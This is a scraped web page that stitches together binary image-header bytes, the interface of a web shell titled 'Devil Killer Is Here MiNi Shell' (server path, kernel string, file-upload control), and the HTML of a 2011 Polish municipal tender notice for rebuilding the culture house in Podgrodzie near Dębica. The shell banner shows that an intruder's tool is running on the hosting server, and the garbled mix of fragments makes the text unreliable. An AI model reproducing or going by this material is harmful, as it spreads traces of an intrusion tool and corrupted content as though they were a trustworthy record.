JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110531/152767-N-2011.html

<p class="kh_header"><b>Dębica: Rozbudowa i przebudowa budynku Domu Kultury w Podgrodziu</b><br>
<b>Numer ogłoszenia: 152767 - 2011; data zamieszczenia: 31.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy w Dębicy , ul. Batorego 13, 39-200 Dębica, woj. podkarpackie, tel. 14 6803342, 6803310, faks 14 6803336.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugdebica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i przebudowa budynku Domu Kultury w Podgrodziu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Rozbudowa i przebudowa budynku Domu Kultury w Podgrodziu.
1. Przedmiotem zamówienia jest: Wykonanie przebudowy i rozbudowy budynku Domu Kultury, który usytuowany jest w Podgrodziu na dz. nr ewid. 593 i 594-1  . Roboty budowlane obejmują  przebudowę  Domu Kultury oraz jego rozbudowę wraz z infrastrukturą towarzyszącą  do której zalicza się :
1) Przebudowę odcinka istniejącego przyłącza gazu wraz z odcinkiem nowobudowanym w ramach jego przebudowy, 
2) Wykonanie projektowanego przyłącza wody i przebudowę istniejącego wodociągu,
3) Likwidację  odcinka przyłącza gazu i odcinka sieci  wodociągowej kolidujących z projektowaną rozbudową,
4) Likwidację studni kopanej przez zasypanie  piaskiem,
5) Wykonanie  niezbędnych dojść  i miejsc postojowych o nawierzchnię z kostki betonowej.

Projektowana przebudowa budynku obejmuje wykonanie wewnętrznych schodów łączących parter z pierwszym piętrem z fragmentem stropu a także poszerzenie i zamurowanie otworów okiennych i drzwiowych.

Istniejący budynek Domu Kultury w Podgrodziu to obiekt o  zróżnicowanej ilości kondygnacji w poszczególnych częściach. Od strony zachodniej budynek jest parterowy i częściowo podpiwniczony, od strony wschodniej piętrowy niepodpiwniczony. Rozbudowa budynku   o salę taneczną  zlokalizowana jest od strony południowo- zachodniej budynku ,a  o pomieszczenia sanitariatów od strony południowo-wschodniej.

Dane liczbowe obiektu :
DANE LICZBOWE
Kategoria	Stan istniejący	Stan projektowany	Stan po rozbudowie 
i przebudowie
Powierzchnia zabudowy	312,81 m2	  112,34 m2	  425,15 m2
Powierzchnia użytkowa	286,01 m2	  74,73 m2	  360,74 m2
Powierzchnia wewnętrzna	585,22 m2	  117,65 m2	  702,87 m2
Powierzchnia całkowita	672,31 m2	161,43 m2	  833,77 m2
Kubatura brutto	2467,93 m3	634,59 m3	3102,52 m3

Opis robót do wykonania w związku z przebudową budynku.
- skucie wszystkich posadzek w suterenach,
- wykonanie nowych podkładów pod posadzki z betonu B10 gr. 10 cm,
- wykonanie poziomej izolacji przeciwwilgociowej z papy termozgrzewalnej,
- wykonanie izolacji termicznej - styropian twardy gr. 5 cm,
- wykonanie warstwy wyrównawczej pod posadzki z zaprawy cementowej gr. 5 cm  zbrojonej siatkami z prętów
  średnicy 3 mm o oczkach 20x20 cm.
- wykonanie nowych posadzek z płytek gresowych antypoślizgowych we wszystkich pomieszczeniach na poziomie
   suteren,
- wykonanie poszerzenia otworów drzwiowych z równoczesnym wykonaniem nadproży,      
-  montaż nowych ościeżnic i skrzydeł drzwiowych,
- wykonanie wyburzenia niektórych istniejących ścian działowych i wykonanie nowych ścian działowych,
- wymiana stolarki okiennej oraz parapetów wewnętrznych (aglomarmur) i zewnętrznych (blaszane z blachy
  powlekanej gr. 0,55 mm),
- demontaż istniejącego pokrycia wraz z częściową wymianą konstrukcji więźby dachowej i nadbiciem krokwi,
- wykonanie foliowania dachu i montaż nowego pokrycia dachu z blachodachówki,

Stan projektowany: 
Na parterze zlokalizowana będzie nadal sala widowiskowa, garderoba, oraz pokój śniadań (przystosowany do podgrzewalnia posiłków własnych przynoszonych przez pracowników tj. personel domu kultury) oraz dwa pomieszczenia magazynowe. Dodatkowo w obrębie parteru zaprojektowano lokalizację biblioteki, sali tanecznej, ogólno dostępnych sanitariatów oraz szatni z wieszakami na odzież.
Na pierwszym piętrze będzie nadal centrala telefoniczna, oraz zaprojektowana ogólnodostępna sala  klubowa.

Fundamenty- monolityczne żelbetowe. 

Ściany z bloczków gazobetonowych gr. 24 cm i 12 cm i 6 cm układanych na zaprawie cementowo-wapiennej. 

Płyta stropowa nad parterem (nad sanitariatami) - żelbetowa, monolityczna, krzyżowo zbrojona. 

Schody wewnętrzne, schody zewnętrzne:
- schody wewnętrzne- monolityczne żelbetowe płytowe trójbiegowe,  schody zewnętrzne- płytowe, żelbetowe
  monolityczne.

Konstrukcja dachu  -więźba dachowa w systemie krokwiowym  drewniana. 

Pokrycie dachu z blachodachówki. Na części istniejącej projektuje się wymianę pokrycia z częściową wymianą elementów konstrukcyjnych więźby dachowej i łacenia.  

Elementy wykończenia budynku.
Posadzki: - w istniejącej części  skucie posadzek na wszystkich kondygnacjach i wykonanie nowych.
Tynki w suterenach skuć w całości i wykonać nowe cementowo-wapienne malowane emulsyjnie,  pozostałe tynki cementowo-wapienne zatarte na gładko gładzią gipsową, zagruntowane i  malowane emulsyjnie.
Na zewnątrz budynku -wyprawa tynkarska cienkopowłokowa silikonowo-silikatowa.
Okładziny ścienne w pomieszczeniach sanitarnych, pom. pokoju śniadań z płytek glazurowanych na kleju do pełnej wysokości ścian. Na zewnątrz budynku z płytek ceramicznych bezspoinowych lub klinkierowych.
Izolacje cieplne-   zastosowanie styropianu, wełny mineralnej, fundamenty styrodur,
Izolacje cieplne ścian i stropów przewidziano ze styropianu.
Izolacje przeciwwilgociowe:  -posadzka na gruncie- papa termozgrzewalna, - ściany fundamentowe - izolacje poziome 2x papa na lepiku,   pionowe -powłoka hydroizolacyjna oraz folia kubełkowa osłaniająca styropian.
Malowanie tynków farbą emulsyjną do wymalowań wewnętrznych zgodnie z opisem na rysunkach rzutów kondygnacji. 
Okna w suterenach okna z profili PCV - profil 5 komorowy. Na wyższych kondygnacjach okna drewniane, szyba zespolona niskoemisyjna.  Stolarka drzwiowa- wewnętrzna drzwiowa, drewniana, typowa. Drzwi zewnętrzne do budynku aluminiowe przeszklone. Odwodnienie: - rynny  i rury spustowe ,obróbki blacharskie okapów i kominów z blachy powlekanej gr. 0,55 mm.

Opis robót termomodernizacyjnych:  Jako warstwę izolacji termicznej projektuje się styropian o grubości 12 cm i 
15 cm. Przyjęto bezspoinowy system ociepleń (BSO) . Warstwę fakturową stanowić będzie cienkopowłokowa silikatowo-silikonowa wyprawa elewacyjna. 

Wykonawca winien zawiadomić  w imieniu Inwestora właściwy organ nadzoru budowlanego o zakończeniu budowy co najmniej 21 dni przed zamierzonym terminem przystąpienia do użytkowania oraz uzyskać w imieniu Inwestora : certyfikaty, świadectwa (w tym świadectwo energetyczne), uzgodnienia, opinie, inwentaryzację geodezyjną. 
2.   Opis  przedmiotu  zamówienia  stanowią : 
       
   - projekty wykonawcze - wykonane przez  firmę:  PROINWEST  Projektowanie i Realizacja Inwestycji 
   Spółka Cywilna Andrzej Bauer, Wacław Cebula  z siedzibą  : 39-200 Dębica ul. Raczyńskich 3.
   - specyfikacje  techniczne  wykonania  i  odbioru  robót - wykonane przez firmę: PROINWEST  Projektowanie i 
     Realizacja Inwestycji Spółka Cywilna Andrzej Bauer, Wacław Cebula  z siedzibą  : 39-200 Dębica ul. Raczyńskich 3
   - przedmiary  robót - wykonane  przez firmę: PROINWEST  Projektowanie i Realizacja  Inwestycji Spółka Cywilna
     Andrzej Bauer, Wacław Cebula  z siedzibą  : 39-200 Dębica ul. Raczyńskich 3

Użyte w projektach wykonawczych , specyfikacjach  technicznych  wykonania  i  odbioru  robót i przedmiarach robót nazwy handlowe, pochodzenia materiałów, wyrobów, elementów i wyposażenia, nie są zobowiązujące,  a Zamawiający dopuszcza użycie materiałów i urządzeń równoważnych o parametrach nie gorszych niż użyte w  w/w  dokumentach.

3. Opisując przedmiot zamówienia za pomocą norm, aprobat, specyfikacji technicznych i systemów odniesienia, o których mowa w art. 30 ust. 1-3 ustawy Prawo zamówień publicznych,  które są zawarte w w/w projektach wykonawczych, przedmiarach robót i specyfikacjach technicznych wykonania i odbioru robót budowlanych zamawiający dopuszcza  rozwiązania równoważne opisywanym .
Wykonawca powołując się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy lub roboty budowlane spełniają wymagania określone przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE  WADIUM

1.	Zamawiający wymaga  wniesienia wadium w wysokości  30 000,00 zł (słownie: trzydzieści tysięcy złotych 00/100)
2.	Wadium może być wnoszone w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
            Wadium wnoszone w pieniądzu należy wnieść przelewem  na konto Zamawiającego: 
             63 12 40 4764 1111 0000 4861 2049  w banku PEKAO SA Oddział w Dębicy.
          W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się  datę i godzinę
          uznania  kwoty na   rachunku Zamawiającego.
4.       W przypadku Wykonawców  ubiegających się wspólnie o udzielenie zamówienia (art.23 ustawy Pzp) i  
    wniesienia wadium w formie opisanej w art.45 ust.6 pkt 3 i 4 tj. gwarancjach bankowych i
    ubezpieczeniowych- Zamawiający żąda aby w treści gwarancji byli wskazani wszyscy Wykonawcy
    ubiegający się wspólnie o udzielenie zamówienia( np. w konsorcjum - wszyscy uczestnicy
    konsorcjum, w spółce cywilnej - wszyscy wspólnicy spółki cywilnej). 
    Gwarancje winny być bezwarunkowe.
5.      W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego
         wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego  w
         Sekretariacie pok. 17  lub zamieścić w osobnej kopercie - opisanej WADIUM dołączonej do oferty.
6.      Nie wniesienie wadium w terminie spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2)
         ustawy, a jego oferta zostanie uznana za odrzuconą  na podstawie art. 24 ust. 4 ustawy.
7.      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli : 
      a)  Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26.ust.3 ustawy Pzp , nie złożył 
           dokumentów lub oświadczeń, o których mowa w art.25 ust.1 ustawy Pzp lub pełnomocnictw , 
          chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
      b)  Wykonawca, którego oferta została wybrana :
           - odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
           - nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
           - zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie
             Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Zamawiający uzna, że warunek posiadania wiedzy jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ).

2)  Zamawiający uzna, że warunek posiadania doświadczenia jest spełniony, jeżeli Wykonawca wykaże, że 
w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - 
w tym okresie) -  wykonał  minimum 1  robotę budowlaną polegającą na budowie lub przebudowie lub rozbudowie budynku (zgodnie z definicją budynku zawartą w Rozporządzeniu Ministra Infrastruktury z dnia 12 kwietnia 2002 r.  Dz. U. z 2002 r. Nr 75 poz. 690 z późn. zmianami) o kubaturze minimum 2 500,00  m3  i o  wartości  robót  minimum    900 000,00 zł  brutto, oraz załączy dokument potwierdzający, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone ,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania odpowiednim potencjałem technicznym jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie w zakresie art.22 ust.1 ustawy Pzp - (Załącznik nr 2 do SIWZ).
Zamawiający nie precyzuje konkretnych warunków udziału w postępowaniu dotyczących dysponowania odpowiednim potencjałem technicznym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dysponowania osobami zdolnymi do wykonania zamówienia jest spełniony, jeżeli Wykonawca wykaże, że w wykonaniu zamówienia będą uczestniczyć osoby z uprawnieniami do pełnienia   samodzielnych  funkcji technicznych  w budownictwie, w zakresie kierowania robotami budowlanymi tj.  :  
 
a) - minimum 1 osoba w  specjalności konstrukcyjno budowlanej, posiadająca uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń (lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa) i posiadająca co najmniej 5-letnie doświadczenie w pracy na stanowisku kierownika budowy w branży konstrukcyjno- budowlanej - osoba ta będzie pełnić obowiązki kierownika budowy przy realizacji zamówienia, 

b) - minimum 1 osoba w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych , wentylacyjnych,
gazowych, wodociągowych, kanalizacyjnych, która będzie pełnić obowiązki kierownika robót, posiadająca    uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń (lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa)

c) - minimum 1 osoba w  specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i
elektroenergetycznych, która będzie pełnić obowiązki kierownika robót, posiadająca    uprawnienia budowlane w zakresie kierowania robotami budowlanymi bez ograniczeń (lub uprawnienia równoważne do powyższych, a wydane na podstawie wcześniej obowiązujących przepisów prawa)

                   Zamawiający, określając wymagania dla osób w zakresie posiadania uprawnień budowlanych dopuszcza odpowiadające im uprawnienia, wydane obywatelom państw Europejskiego Obszaru gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art.12a oraz innych przepisów ustawy Prawo budowlane (tekst jednolity Dz.U. z 2006 r. 
Nr 156, poz.1118 z późn.zmianami) oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r. Nr 63, poz.394)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek  dotyczący sytuacji ekonomicznej i finansowej jest spełniony, jeżeli Wykonawca złoży wraz z ofertą Oświadczenie o spełnianiu warunków udziału w postępowaniu - (Załącznik nr 2 do SIWZ).
Zamawiający nie precyzuje konkretnych warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej i finansowej .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie z art.44 ustawy Prawo zamówień publicznych , wykonawca składa wraz z ofertą
  oświadczenie o spełnieniu warunków udziału w postępowaniu - Oświadczenie w zakresie art.22 ust.1
  ustawy Pzp (Załącznik nr 2 do SIWZ), a jeżeli zamawiający żąda dokumentów  potwierdzających
  spełnianie tych warunków, również te dokumenty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany, jakie strony chciałyby wprowadzić do ustaleń wynikających z niniejszej umowy, wymagają formy pisemnej i zgody obu stron pod rygorem nieważności takich zmian.
  2. Wyłącznie w przypadku wystąpienia okoliczności których Zamawiający nie mógł przewidzieć w dniu zawarcia umowy możliwa jest zmiana umowy dotycząca :
1) terminu realizacji przedmiotu zamówienia w uzgodnieniu z Wykonawcą w następujących przypadkach:
    a)  wstrzymania robót przez  inspektora nadzoru inwestorskiego potwierdzonego wpisem w Dzienniku budowy,
